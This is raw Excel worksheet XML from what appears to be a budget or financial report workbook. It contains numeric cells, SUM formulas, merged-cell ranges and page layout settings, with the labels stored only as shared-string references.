      <c r="B29" s="51">
        <f>SUM(B30:B33)</f>
        <v>33579</v>
      </c>
    </row>
    <row r="30" spans="1:2" s="2" customFormat="1" ht="18.95" customHeight="1">
      <c r="A30" s="53" t="s">
        <v>1176</v>
      </c>
      <c r="B30" s="54">
        <v>9392</v>
      </c>
    </row>
    <row r="31" spans="1:2" s="2" customFormat="1" ht="18.95" customHeight="1">
      <c r="A31" s="53" t="s">
        <v>1177</v>
      </c>
      <c r="B31" s="54">
        <v>24049</v>
      </c>
    </row>
    <row r="32" spans="1:2" s="2" customFormat="1" ht="18.95" customHeight="1">
      <c r="A32" s="53" t="s">
        <v>1178</v>
      </c>
      <c r="B32" s="54"/>
    </row>
    <row r="33" spans="1:2" s="2" customFormat="1" ht="18.95" customHeight="1">
      <c r="A33" s="53" t="s">
        <v>1179</v>
      </c>
      <c r="B33" s="54">
        <v>138</v>
      </c>
    </row>
    <row r="34" spans="1:2" s="1" customFormat="1" ht="18.95" customHeight="1">
      <c r="A34" s="52" t="s">
        <v>1211</v>
      </c>
      <c r="B34" s="51">
        <v>1037692</v>
      </c>
    </row>
    <row r="35" spans="1:2" s="1" customFormat="1" ht="18.95" customHeight="1">
      <c r="A35" s="52" t="s">
        <v>1212</v>
      </c>
      <c r="B35" s="51">
        <v>1069000</v>
      </c>
    </row>
    <row r="36" spans="1:2" s="2" customFormat="1" ht="51" customHeight="1">
      <c r="A36" s="778" t="s">
        <v>1213</v>
      </c>
      <c r="B36" s="778"/>
    </row>
    <row r="37" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A37" s="56"/>
      <c r="B37" s="57"/>
    </row>
    <row r="38" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A38" s="56"/>
      <c r="B38" s="57"/>
    </row>
    <row r="39" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A39" s="56"/>
      <c r="B39" s="57"/>
    </row>
    <row r="40" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A40" s="56"/>
      <c r="B40" s="57"/>
    </row>
    <row r="41" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A41" s="56"/>
      <c r="B41" s="57"/>
    </row>
    <row r="42" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A42" s="56"/>
      <c r="B42" s="57"/>
    </row>
    <row r="43" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A43" s="56"/>
      <c r="B43" s="57"/>
    </row>
    <row r="44" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A44" s="56"/>
      <c r="B44" s="57"/>
    </row>
    <row r="45" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="B45" s="57"/>
    </row>
    <row r="46" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="B46" s="57"/>
    </row>
    <row r="47" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="B47" s="57"/>
    </row>
    <row r="48" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="B48" s="57"/>
    </row>
    <row r="49" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B49" s="57"/>
    </row>
    <row r="50" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B50" s="57"/>
    </row>
    <row r="51" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B51" s="57"/>
    </row>
    <row r="52" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B52" s="57"/>
    </row>
    <row r="53" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B53" s="57"/>
    </row>
    <row r="54" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B54" s="57"/>
    </row>
    <row r="55" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B55" s="57"/>
    </row>
    <row r="56" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B56" s="57"/>
    </row>
    <row r="57" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B57" s="57"/>
    </row>
    <row r="58" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B58" s="57"/>
    </row>
    <row r="59" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B59" s="57"/>
    </row>
    <row r="60" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B60" s="57"/>
    </row>
    <row r="61" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B61" s="57"/>
    </row>
    <row r="62" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B62" s="57"/>
    </row>
    <row r="63" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B63" s="57"/>
    </row>
    <row r="64" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B64" s="57"/>
    </row>
    <row r="65" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B65" s="57"/>
    </row>
    <row r="66" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B66" s="57"/>
    </row>
    <row r="67" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B67" s="57"/>
    </row>
    <row r="68" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B68" s="57"/>
    </row>
    <row r="69" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B69" s="57"/>
    </row>
    <row r="70" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B70" s="57"/>
    </row>
    <row r="71" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B71" s="57"/>
    </row>
    <row r="72" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B72" s="57"/>
    </row>
    <row r="73" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B73" s="57"/>
    </row>
    <row r="74" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B74" s="57"/>
    </row>
    <row r="75" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B75" s="57"/>
    </row>
    <row r="76" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B76" s="57"/>
    </row>
    <row r="77" spans="2:2" s="2" customFormat="1" ht="14.25">
      <c r="B77" s="57"/>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A3:B3"/>
    <mergeCell ref="A36:B36"/>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tabSelected="1" workbookViewId="0">
      <selection activeCell="K8" sqref="K8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="10" style="2" customWidth="1"/>
    <col min="2" max="2" width="8.5703125" style="2" customWidth="1"/>
    <col min="3" max="3" width="8" style="2" customWidth="1"/>
    <col min="4" max="4" width="7.42578125" style="2" customWidth="1"/>
    <col min="5" max="5" width="7" style="2" customWidth="1"/>
    <col min="6" max="6" width="7.7109375" style="2" customWidth="1"/>
    <col min="7" max="8" width="7.42578125" style="2" customWidth="1"/>
    <col min="9" max="9" width="7.28515625" style="2" customWidth="1"/>
    <col min="10" max="10" width="7.5703125" style="2" customWidth="1"/>
    <col min="11" max="11" width="37.42578125" style="2" customWidth="1"/>
    <col min="12" max="16384" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" ht="18" customHeight="1">
      <c r="A1" s="38" t="s">
        <v>1214</v>
      </c>
      <c r="B1" s="39"/>
      <c r="C1" s="39"/>
      <c r="D1" s="39"/>
      <c r="E1" s="39"/>
      <c r="F1" s="39"/>
      <c r="G1" s="39"/>
      <c r="H1" s="39"/>
      <c r="I1" s="39"/>
      <c r="J1" s="39"/>
      <c r="K1" s="39"/>
    </row>
    <row r="2" spans="1:11" ht="29.1" customHeight="1">
      <c r="A2" s="780" t="s">
        <v>1215</v>
      </c>
      <c r="B2" s="780"/>
      <c r="C2" s="780"/>
      <c r="D2" s="780"/>
      <c r="E2" s="780"/>
      <c r="F2" s="780"/>
      <c r="G2" s="780"/>
      <c r="H2" s="780"/>
      <c r="I2" s="780"/>
      <c r="J2" s="780"/>
      <c r="K2" s="780"/>
    </row>
    <row r="3" spans="1:11" ht="24" customHeight="1">
      <c r="A3" s="781" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="781"/>
      <c r="C3" s="781"/>
      <c r="D3" s="781"/>
      <c r="E3" s="781"/>
      <c r="F3" s="781"/>
      <c r="G3" s="781"/>
      <c r="H3" s="781"/>
      <c r="I3" s="781"/>
      <c r="J3" s="781"/>
      <c r="K3" s="781"/>
    </row>
    <row r="4" spans="1:11" ht="24" customHeight="1">
      <c r="A4" s="756" t="s">
        <v>427</v>
      </c>
      <c r="B4" s="756" t="s">
        <v>1216</v>
      </c>
      <c r="C4" s="756" t="s">
        <v>1217</v>
      </c>
      <c r="D4" s="756"/>
      <c r="E4" s="756"/>
      <c r="F4" s="756"/>
      <c r="G4" s="756"/>
      <c r="H4" s="756"/>
      <c r="I4" s="756"/>
      <c r="J4" s="756"/>
      <c r="K4" s="756" t="s">
        <v>1218</v>
      </c>
    </row>
    <row r="5" spans="1:11" ht="24" customHeight="1">
      <c r="A5" s="756"/>
      <c r="B5" s="756"/>
      <c r="C5" s="756" t="s">
        <v>1219</v>
      </c>
      <c r="D5" s="756"/>
      <c r="E5" s="756"/>
      <c r="F5" s="756"/>
      <c r="G5" s="756"/>
      <c r="H5" s="756"/>
      <c r="I5" s="756"/>
      <c r="J5" s="756" t="s">
        <v>1220</v>
      </c>
      <c r="K5" s="756"/>
    </row>
    <row r="6" spans="1:11" ht="24" customHeight="1">
      <c r="A6" s="756"/>
      <c r="B6" s="756"/>
      <c r="C6" s="756" t="s">
        <v>408</v>
      </c>
      <c r="D6" s="756" t="s">
        <v>1221</v>
      </c>
      <c r="E6" s="756"/>
      <c r="F6" s="756"/>
      <c r="G6" s="756" t="s">
        <v>1222</v>
      </c>
      <c r="H6" s="756"/>
      <c r="I6" s="756"/>
      <c r="J6" s="756"/>
      <c r="K6" s="756"/>
    </row>
    <row r="7" spans="1:11" ht="89.25" customHeight="1">
      <c r="A7" s="756"/>
      <c r="B7" s="756"/>
      <c r="C7" s="756"/>
      <c r="D7" s="41" t="s">
        <v>1152</v>
      </c>
      <c r="E7" s="41" t="s">
        <v>1223</v>
      </c>
      <c r="F7" s="41" t="s">
        <v>1224</v>
      </c>
      <c r="G7" s="41" t="s">
        <v>1152</v>
      </c>
      <c r="H7" s="41" t="s">
        <v>1150</v>
      </c>
      <c r="I7" s="41" t="s">
        <v>1225</v>
      </c>
      <c r="J7" s="756"/>
      <c r="K7" s="756"/>
    </row>
    <row r="8" spans="1:11" ht="120" customHeight="1">
      <c r="A8" s="42" t="s">
        <v>1226</v>
      </c>
      <c r="B8" s="42">
        <v>650000</v>
      </c>
      <c r="C8" s="42">
        <f>D8+G8</f>
        <v>40000</v>
      </c>
      <c r="D8" s="42">
        <f>E8+F8</f>
        <v>0</v>
      </c>
      <c r="E8" s="42"/>
      <c r="F8" s="42"/>
      <c r="G8" s="42">
        <f>H8+I8</f>
        <v>40000</v>
      </c>
      <c r="H8" s="42">
        <v>40000</v>
      </c>
      <c r="I8" s="42"/>
      <c r="J8" s="42"/>
      <c r="K8" s="45" t="s">
        <v>1227</v>
      </c>
    </row>
    <row r="9" spans="1:11" ht="86.25" customHeight="1">
      <c r="A9" s="42" t="s">
        <v>1228</v>
      </c>
      <c r="B9" s="42">
        <v>6180</v>
      </c>
      <c r="C9" s="42">
        <f>D9+G9</f>
        <v>1000</v>
      </c>
      <c r="D9" s="42">
        <f>E9+F9</f>
        <v>0</v>
      </c>
      <c r="E9" s="42"/>
      <c r="F9" s="42"/>
      <c r="G9" s="42">
        <f>H9+I9</f>
        <v>1000</v>
      </c>
      <c r="H9" s="42">
        <v>1000</v>
      </c>
      <c r="I9" s="42"/>
      <c r="J9" s="42">
        <v>5180</v>
      </c>
      <c r="K9" s="45" t="s">
        <v>1229</v>
      </c>
    </row>
    <row r="10" spans="1:11" ht="138.75" customHeight="1">
      <c r="A10" s="42" t="s">
        <v>1230</v>
      </c>
      <c r="B10" s="42">
        <v>120000</v>
      </c>
      <c r="C10" s="42">
        <f>D10+G10</f>
        <v>19000</v>
      </c>
      <c r="D10" s="42">
        <f>E10+F10</f>
        <v>0</v>
      </c>
      <c r="E10" s="42"/>
      <c r="F10" s="42"/>
      <c r="G10" s="42">
        <f>H10+I10</f>
        <v>19000</v>
      </c>
      <c r="H10" s="42">
        <v>19000</v>
      </c>
      <c r="I10" s="42"/>
      <c r="J10" s="42"/>
      <c r="K10" s="45" t="s">
        <v>1231</v>
      </c>
    </row>
    <row r="11" spans="1:11" ht="45" customHeight="1">
      <c r="A11" s="779" t="s">
        <v>1232</v>
      </c>
      <c r="B11" s="779"/>
      <c r="C11" s="779"/>
      <c r="D11" s="779"/>
      <c r="E11" s="779"/>
      <c r="F11" s="779"/>
      <c r="G11" s="779"/>
      <c r="H11" s="779"/>
      <c r="I11" s="779"/>
      <c r="J11" s="779"/>
      <c r="K11" s="779"/>
    </row>
    <row r="12" spans="1:11">
      <c r="A12" s="43"/>
      <c r="B12" s="43"/>
      <c r="C12" s="43"/>
      <c r="D12" s="43"/>
      <c r="E12" s="43"/>
      <c r="F12" s="43"/>
      <c r="G12" s="43"/>
      <c r="H12" s="43"/>
      <c r="I12" s="43"/>
      <c r="J12" s="43"/>
      <c r="K12" s="43"/>
    </row>
    <row r="13" spans="1:11">
      <c r="A13" s="43"/>
      <c r="B13" s="43"/>
      <c r="C13" s="43"/>
      <c r="D13" s="43"/>
      <c r="E13" s="43"/>
      <c r="F13" s="43"/>
      <c r="G13" s="43"/>
      <c r="H13" s="43"/>
      <c r="I13" s="43"/>
      <c r="J13" s="43"/>
      <c r="K13" s="43"/>
    </row>
    <row r="14" spans="1:11">
      <c r="A14" s="44"/>
      <c r="B14" s="44"/>
      <c r="C14" s="44"/>
      <c r="D14" s="44"/>
      <c r="E14" s="44"/>
      <c r="F14" s="44"/>
      <c r="G14" s="44"/>
      <c r="H14" s="44"/>
      <c r="I14" s="44"/>
      <c r="J14" s="44"/>
      <c r="K14" s="44"/>
    </row>
    <row r="15" spans="1:11">
      <c r="A15" s="44"/>
      <c r="B15" s="44"/>
      <c r="C15" s="44"/>
      <c r="D15" s="44"/>
      <c r="E15" s="44"/>
      <c r="F15" s="44"/>
      <c r="G15" s="44"/>
      <c r="H15" s="44"/>
      <c r="I15" s="44"/>
      <c r="J15" s="44"/>
      <c r="K15" s="44"/>
    </row>
    <row r="16" spans="1:11">
      <c r="A16" s="44"/>
      <c r="B16" s="44"/>
      <c r="C16" s="44"/>
      <c r="D16" s="44"/>
      <c r="E16" s="44"/>
      <c r="F16" s="44"/>
      <c r="G16" s="44"/>
      <c r="H16" s="44"/>
      <c r="I16" s="44"/>
      <c r="J16" s="44"/>
      <c r="K16" s="44"/>
    </row>
    <row r="17" spans="1:11">
      <c r="A17" s="44"/>
      <c r="B17" s="44"/>
      <c r="C17" s="44"/>
      <c r="D17" s="44"/>
      <c r="E17" s="44"/>
      <c r="F17" s="44"/>
      <c r="G17" s="44"/>
      <c r="H17" s="44"/>
      <c r="I17" s="44"/>
      <c r="J17" s="44"/>
      <c r="K17" s="44"/>
    </row>
    <row r="18" spans="1:11">
      <c r="A18" s="44"/>
      <c r="B18" s="44"/>
      <c r="C18" s="44"/>
      <c r="D18" s="44"/>
      <c r="E18" s="44"/>
      <c r="F18" s="44"/>
      <c r="G18" s="44"/>
      <c r="H18" s="44"/>
      <c r="I18" s="44"/>
      <c r="J18" s="44"/>
      <c r="K18" s="44"/>
    </row>
    <row r="19" spans="1:11">
      <c r="A19" s="44"/>
      <c r="B19" s="44"/>
      <c r="C19" s="44"/>
      <c r="D19" s="44"/>
      <c r="E19" s="44"/>
      <c r="F19" s="44"/>
      <c r="G19" s="44"/>
      <c r="H19" s="44"/>
      <c r="I19" s="44"/>
      <c r="J19" s="44"/>
      <c r="K19" s="44"/>
    </row>
    <row r="20" spans="1:11">
      <c r="A20" s="44"/>
      <c r="B20" s="44"/>
      <c r="C20" s="44"/>
      <c r="D20" s="44"/>
      <c r="E20" s="44"/>
      <c r="F20" s="44"/>
      <c r="G20" s="44"/>
      <c r="H20" s="44"/>
      <c r="I20" s="44"/>
      <c r="J20" s="44"/>
      <c r="K20" s="44"/>
    </row>
    <row r="21" spans="1:11">
      <c r="A21" s="44"/>
      <c r="B21" s="44"/>
      <c r="C21" s="44"/>
      <c r="D21" s="44"/>
      <c r="E21" s="44"/>
      <c r="F21" s="44"/>
      <c r="G21" s="44"/>
      <c r="H21" s="44"/>
      <c r="I21" s="44"/>
      <c r="J21" s="44"/>
      <c r="K21" s="44"/>
    </row>
    <row r="22" spans="1:11">
      <c r="A22" s="44"/>
      <c r="B22" s="44"/>
      <c r="C22" s="44"/>
      <c r="D22" s="44"/>
      <c r="E22" s="44"/>
      <c r="F22" s="44"/>
      <c r="G22" s="44"/>
      <c r="H22" s="44"/>
      <c r="I22" s="44"/>
      <c r="J22" s="44"/>
      <c r="K22" s="44"/>
    </row>
    <row r="23" spans="1:11">
      <c r="A23" s="44"/>
      <c r="B23" s="44"/>
      <c r="C23" s="44"/>
      <c r="D23" s="44"/>
      <c r="E23" s="44"/>
      <c r="F23" s="44"/>
      <c r="G23" s="44"/>
      <c r="H23" s="44"/>
      <c r="I23" s="44"/>
      <c r="J23" s="44"/>
      <c r="K23" s="44"/>
    </row>
    <row r="24" spans="1:11">
      <c r="A24" s="44"/>
      <c r="B24" s="44"/>
      <c r="C24" s="44"/>
      <c r="D24" s="44"/>
      <c r="E24" s="44"/>
      <c r="F24" s="44"/>
      <c r="G24" s="44"/>
      <c r="H24" s="44"/>
      <c r="I24" s="44"/>
      <c r="J24" s="44"/>
      <c r="K24" s="44"/>
    </row>
    <row r="25" spans="1:11">
      <c r="A25" s="44"/>
      <c r="B25" s="44"/>
      <c r="C25" s="44"/>
      <c r="D25" s="44"/>
      <c r="E25" s="44"/>
      <c r="F25" s="44"/>
      <c r="G25" s="44"/>
      <c r="H25" s="44"/>
      <c r="I25" s="44"/>
      <c r="J25" s="44"/>
      <c r="K25" s="44"/>
    </row>
    <row r="26" spans="1:11">
      <c r="A26" s="44"/>
      <c r="B26" s="44"/>
      <c r="C26" s="44"/>
      <c r="D26" s="44"/>
      <c r="E26" s="44"/>
      <c r="F26" s="44"/>
      <c r="G26" s="44"/>
      <c r="H26" s="44"/>
      <c r="I26" s="44"/>
      <c r="J26" s="44"/>
      <c r="K26" s="44"/>
    </row>
    <row r="27" spans="1:11">
      <c r="A27" s="44"/>
      <c r="B27" s="44"/>
      <c r="C27" s="44"/>
      <c r="D27" s="44"/>
      <c r="E27" s="44"/>
      <c r="F27" s="44"/>
      <c r="G27" s="44"/>
      <c r="H27" s="44"/>
      <c r="I27" s="44"/>
      <c r="J27" s="44"/>
      <c r="K27" s="44"/>
    </row>
    <row r="28" spans="1:11">
      <c r="A28" s="44"/>
      <c r="B28" s="44"/>
      <c r="C28" s="44"/>
      <c r="D28" s="44"/>
      <c r="E28" s="44"/>
      <c r="F28" s="44"/>
      <c r="G28" s="44"/>
      <c r="H28" s="44"/>
      <c r="I28" s="44"/>
      <c r="J28" s="44"/>
      <c r="K28" s="44"/>
    </row>
    <row r="29" spans="1:11">
      <c r="A29" s="44"/>
      <c r="B29" s="44"/>
      <c r="C29" s="44"/>
      <c r="D29" s="44"/>
      <c r="E29" s="44"/>
      <c r="F29" s="44"/>
      <c r="G29" s="44"/>
      <c r="H29" s="44"/>
      <c r="I29" s="44"/>
      <c r="J29" s="44"/>
      <c r="K29" s="44"/>
    </row>
    <row r="30" spans="1:11">
      <c r="A30" s="44"/>
      <c r="B30" s="44"/>
      <c r="C30" s="44"/>
      <c r="D30" s="44"/>
      <c r="E30" s="44"/>
      <c r="F30" s="44"/>
      <c r="G30" s="44"/>
      <c r="H30" s="44"/>
      <c r="I30" s="44"/>
      <c r="J30" s="44"/>
      <c r="K30" s="44"/>
    </row>
    <row r="31" spans="1:11">
      <c r="A31" s="44"/>
      <c r="B31" s="44"/>
      <c r="C31" s="44"/>
      <c r="D31" s="44"/>
      <c r="E31" s="44"/>
      <c r="F31" s="44"/>
      <c r="G31" s="44"/>
      <c r="H31" s="44"/>
      <c r="I31" s="44"/>
      <c r="J31" s="44"/>
      <c r="K31" s="44"/>
    </row>
    <row r="32" spans="1:11">
      <c r="A32" s="44"/>
      <c r="B32" s="44"/>
      <c r="C32" s="44"/>
      <c r="D32" s="44"/>
      <c r="E32" s="44"/>
      <c r="F32" s="44"/>
      <c r="G32" s="44"/>
      <c r="H32" s="44"/>
      <c r="I32" s="44"/>
      <c r="J32" s="44"/>
      <c r="K32" s="44"/>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="A2:K2"/>
    <mergeCell ref="A3:K3"/>
    <mergeCell ref="C4:J4"/>
    <mergeCell ref="C5:I5"/>
    <mergeCell ref="D6:F6"/>
    <mergeCell ref="G6:I6"/>
    <mergeCell ref="A11:K11"/>
    <mergeCell ref="A4:A7"/>
    <mergeCell ref="B4:B7"/>
    <mergeCell ref="C6:C7"/>
    <mergeCell ref="J5:J7"/>
    <mergeCell ref="K4:K7"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" scale="84" fitToHeight="0"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4"/>
  <sheetViews>
    <sheetView showZeros="0" zoomScale="89" zoomScaleNormal="89" workbookViewId="0">
      <selection activeCell="A3" sqref="A3:E3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="27.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="29.42578125" style="2" customWidth="1"/>
    <col min="2" max="4" width="12.7109375" style="2" customWidth="1"/>
    <col min="5" max="5" width="25.85546875" style="32" customWidth="1"/>
    <col min="6" max="16382" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5 16383:16383" s="2" customFormat="1" ht="18" customHeight="1">
      <c r="A1" s="782" t="s">
        <v>1233</v>
      </c>
      <c r="B1" s="782"/>
      <c r="C1" s="782"/>
      <c r="D1" s="782"/>
      <c r="E1" s="782"/>
    </row>
    <row r="2" spans="1:5 16383:16383" s="2" customFormat="1" ht="24.6" customHeight="1">
      <c r="A2" s="783" t="s">
        <v>1234</v>
      </c>
      <c r="B2" s="783"/>
      <c r="C2" s="783"/>
      <c r="D2" s="783"/>
      <c r="E2" s="783"/>
    </row>
    <row r="3" spans="1:5 16383:16383" s="2" customFormat="1" ht="36" customHeight="1">
      <c r="A3" s="784" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="784"/>
      <c r="C3" s="784"/>
      <c r="D3" s="784"/>
      <c r="E3" s="784"/>
    </row>
    <row r="4" spans="1:5 16383:16383" s="2" customFormat="1" ht="38.1" customHeight="1">
      <c r="A4" s="685" t="s">
        <v>1235</v>
      </c>
      <c r="B4" s="785" t="s">
        <v>1236</v>
      </c>
      <c r="C4" s="785"/>
      <c r="D4" s="785"/>
      <c r="E4" s="685" t="s">
        <v>1237</v>
      </c>
    </row>
    <row r="5" spans="1:5 16383:16383" s="2" customFormat="1" ht="38.1" customHeight="1">
      <c r="A5" s="685"/>
      <c r="B5" s="33" t="s">
        <v>383</v>
      </c>
      <c r="C5" s="33" t="s">
        <v>1238</v>
      </c>
      <c r="D5" s="33" t="s">
        <v>1239</v>
      </c>
      <c r="E5" s="685"/>
    </row>
    <row r="6" spans="1:5 16383:16383" s="2" customFormat="1" ht="46.5" customHeight="1">
      <c r="A6" s="34" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="35">
        <f>C6+D6</f>
        <v>7028</v>
      </c>
      <c r="C6" s="35">
        <f>SUM(C7:C13)</f>
        <v>7028</v>
      </c>
      <c r="D6" s="35">
        <f>SUM(D7:D13)</f>
        <v>0</v>
      </c>
      <c r="E6" s="34"/>
    </row>
    <row r="7" spans="1:5 16383:16383" s="2" customFormat="1" ht="37.5" customHeight="1">
      <c r="A7" s="36" t="s">
        <v>1240</v>
      </c>
      <c r="B7" s="37">
        <f t="shared" ref="B7:B13" si="0">C7+D7</f>
        <v>1197</v>
      </c>
      <c r="C7" s="37">
        <v>1197</v>
      </c>
      <c r="D7" s="37"/>
      <c r="E7" s="36" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="8" spans="1:5 16383:16383" s="2" customFormat="1" ht="37.5" customHeight="1">
      <c r="A8" s="36" t="s">
        <v>1241</v>
      </c>
      <c r="B8" s="37">
        <f t="shared" si="0"/>
        <v>2559</v>
      </c>
      <c r="C8" s="37">
        <v>2559</v>
      </c>
      <c r="D8" s="37"/>
      <c r="E8" s="36" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="9" spans="1:5 16383:16383" s="2" customFormat="1" ht="37.5" customHeight="1">
      <c r="A9" s="36" t="s">
        <v>1242</v>
      </c>
      <c r="B9" s="37">
        <f t="shared" si="0"/>
        <v>1011</v>
      </c>
      <c r="C9" s="37">
        <v>1011</v>
      </c>
      <c r="D9" s="37"/>
      <c r="E9" s="36" t="s">
        <v>552</v>
      </c>
    </row>
    <row r="10" spans="1:5 16383:16383" s="2" customFormat="1" ht="37.5" customHeight="1">
      <c r="A10" s="36" t="s">
        <v>1243</v>
      </c>
      <c r="B10" s="37">
        <f t="shared" si="0"/>
        <v>1073</v>
      </c>
      <c r="C10" s="37">
        <v>1073</v>
      </c>
      <c r="D10" s="37"/>
      <c r="E10" s="36" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="11" spans="1:5 16383:16383" s="2" customFormat="1" ht="37.5" customHeight="1">
      <c r="A11" s="36" t="s">
        <v>1244</v>
      </c>
      <c r="B11" s="37">
        <f t="shared" si="0"/>
        <v>900</v>
      </c>
      <c r="C11" s="37">
        <v>900</v>
      </c>
      <c r="D11" s="37"/>
      <c r="E11" s="36" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="12" spans="1:5 16383:16383" s="2" customFormat="1" ht="37.5" customHeight="1">
      <c r="A12" s="36" t="s">
        <v>1245</v>
      </c>
      <c r="B12" s="37">
        <f t="shared" si="0"/>
        <v>280</v>
      </c>
      <c r="C12" s="37">
        <v>280</v>
      </c>
      <c r="D12" s="37"/>
      <c r="E12" s="36" t="s">
        <v>550</v>
      </c>
    </row>
    <row r="13" spans="1:5 16383:16383" s="2" customFormat="1" ht="37.5" customHeight="1">
      <c r="A13" s="36" t="s">
        <v>1246</v>
      </c>
      <c r="B13" s="37">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="C13" s="37">
        <v>8</v>
      </c>
      <c r="D13" s="37"/>
      <c r="E13" s="36" t="s">
        <v>549</v>
      </c>
    </row>
    <row r="14" spans="1:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E14" s="32"/>
      <c r="XFC14"/>
    </row>
    <row r="15" spans="1:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E15" s="32"/>
      <c r="XFC15"/>
    </row>
    <row r="16" spans="1:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E16" s="32"/>
      <c r="XFC16"/>
    </row>
    <row r="17" spans="5:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E17" s="32"/>
      <c r="XFC17"/>
    </row>
    <row r="18" spans="5:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E18" s="32"/>
      <c r="XFC18"/>
    </row>
    <row r="19" spans="5:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E19" s="32"/>
      <c r="XFC19"/>
    </row>
    <row r="20" spans="5:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E20" s="32"/>
      <c r="XFC20"/>
    </row>
    <row r="21" spans="5:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E21" s="32"/>
      <c r="XFC21"/>
    </row>
    <row r="22" spans="5:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E22" s="32"/>
      <c r="XFC22"/>
    </row>
    <row r="23" spans="5:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E23" s="32"/>
      <c r="XFC23"/>
    </row>
    <row r="24" spans="5:5 16383:16383" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="E24" s="32"/>
      <c r="XFC24"/>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="A1:E1"/>
    <mergeCell ref="A2:E2"/>
    <mergeCell ref="A3:E3"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="E4:E5"/>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96" zoomScaleNormal="96" workbookViewId="0">
      <selection activeCell="F8" sqref="F8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="42.5703125" style="2" customWidth="1"/>
    <col min="2" max="2" width="31.42578125" style="2" customWidth="1"/>
    <col min="3" max="3" width="17.28515625" style="2" customWidth="1"/>
    <col min="4" max="6" width="12" style="2" customWidth="1"/>
    <col min="7" max="7" width="42.28515625" style="2" customWidth="1"/>
    <col min="8" max="16384" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="18" customHeight="1">
      <c r="A1" s="23" t="s">
        <v>1247</v>
      </c>
      <c r="B1" s="24"/>
      <c r="D1" s="25"/>
      <c r="E1" s="25"/>
      <c r="F1" s="25"/>
      <c r="G1" s="25"/>
    </row>
    <row r="2" spans="1:7" ht="24.6" customHeight="1">
      <c r="A2" s="786" t="s">
        <v>1248</v>
      </c>
